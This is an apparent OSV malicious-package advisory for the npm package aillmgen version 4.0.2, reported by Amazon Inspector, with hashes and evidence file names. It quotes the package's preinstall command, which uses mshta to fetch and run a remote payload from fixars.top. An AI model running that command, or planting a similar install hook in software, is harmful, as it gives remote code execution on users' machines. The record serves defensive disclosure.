{"id":"MAL-2026-5927","summary":"Malicious code in aillmgen (npm)","details":"\n---\n_-= Per source details. Do not edit below this line.=-_\n\n## Source: amazon-inspector (5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341)\nOn `npm install`, the package's preinstall hook (preinstall.js) runs `exec('cmd /c \"mshta http://fixars.top\"')`, invoking the Windows mshta.exe binary to fetch and execute an HTA payload from http://fixars.top with the installer's privileges. mshta is a well-known living-off-the-land binary that executes arbitrary HTA/JScript/VBScript content directly from a remote URL, giving the operator of fixars.top remote code execution on any Windows machine that installs this package. The remote endpoint is plain HTTP and attacker-mutable, and the behavior is unrelated to the package's stated LLM-client purpose (the library code references an EasyLLMClient targeting api.easyllm.ai while the package itself is published under the unrelated name `aillmgen` with empty author and description metadata). The combination of install-time RCE, plaintext attacker-controlled fetch-and-execute, impersonation of an LLM-client utility, and placeholder publisher metadata is a supply-chain dropper.\n","modified":"2026-06-16T22:31:49.121604172Z","published":"2026-06-16T22:09:54Z","database_specific":{"malicious-packages-origins":[{"id":"IN-MAL-2026-006837","source":"amazon-inspector","sha256":"5b303e830a204ad1ee237f0403a2844f5dce96fa3e3841392ce92d7f3f502341","versions":["4.0.2"],"import_time":"2026-06-16T22:17:36.229900342Z","modified_time":"2026-06-16T22:09:54Z"}]},"references":[{"type":"PACKAGE","url":"https://www.npmjs.com/package/aillmgen/v/4.0.2"}],"affected":[{"package":{"name":"aillmgen","ecosystem":"npm","purl":"pkg:npm/aillmgen"},"versions":["4.0.2"],"database_specific":{"indicators":{"package_integrity":[{"filename":"aillmgen-4.0.2.tgz","hashes":{"sha512_sri":"sha512-/xoVe3G6bgDxVKZL0AzmWznijt4WejB7NioxzFLzY/toq/W7HnkE7/QljuglUa2M1nPu9RawnDh7ceULiijFnA==","sha1":"e558ff2c70c4434472e0f213073faf72c1accd8e"}}],"evidence_files":[{"tlsh":"70b012d499453234b252a0e02c3060225807c441225055e0648c451d441741516235fd","path":"preinstall.js","sha256":"6531737cdf18669d076b7ff3bf8168ddc74828f385a4a037a47bd8767d11b889"},{"tlsh":"2ed02e388da3e93328c006620c2a9056b2e08f0f04143c0da3cf192c469e673b8ff31e","path":"package.json","sha256":"8c76bc8aabe8bdbe6f4056c99588096e8cdf7a3d8b15cdbc0beb4d136f057966"}]},"source":"https://github.com/ossf/malicious-packages/blob/main/osv/malicious/npm/aillmgen/MAL-2026-5927.json","cwes":[{"description":"The product contains code that appears to be malicious in nature.","cweId":"CWE-506","name":"Embedded Malicious Code"}]}}],"schema_version":"1.7.5","credits":[{"name":"Amazon Inspector","contact":["inspector-research@amazon.com"],"type":"FINDER"}]}